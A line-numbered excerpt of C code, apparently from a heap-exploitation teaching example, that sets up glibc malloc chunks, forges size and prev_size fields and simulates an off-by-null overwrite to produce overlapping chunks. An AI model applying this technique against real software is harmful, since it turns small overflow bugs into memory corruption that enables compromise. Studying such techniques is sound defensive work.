19  void *tmp = malloc(0x1);
22  size_t size = 0x10000 - ((long)tmp&0xffff) - 0x20;
25  void *padding= malloc(size);
30  void *prev = malloc(0x500);
31  void *victim = malloc(0x4f0);
33  malloc(0x10);
42  void *a = malloc(0x4f0);
45  malloc(0x10);
47  void *b = malloc(0x510);
50  malloc(0x10);
53  free(a);
54  free(b);
55  free(prev);
57  malloc(0x1000);
67  void *prev2 = malloc(0x500);
73  ((long *)prev)[1] = 0x501;
75  *(long *)(prev + 0x500) = 0x500;
81  void *b2 = malloc(0x510);
85  ((char*)b2)[0] = '\x10';
86  ((char*)b2)[1] = '\x00';
91  void *a2 = malloc(0x4f0);
92  free(a2);
94  free(victim);
97  void *a3 = malloc(0x4f0);
98  ((char*)a3)[8] = '\x10';
99  ((char*)a3)[9] = '\x00';
105 void *victim2 = malloc(0x4f0);
109 ((char *)victim2)[-8] = '\x00';
119 free(victim);
125 void *merged = malloc(0x100);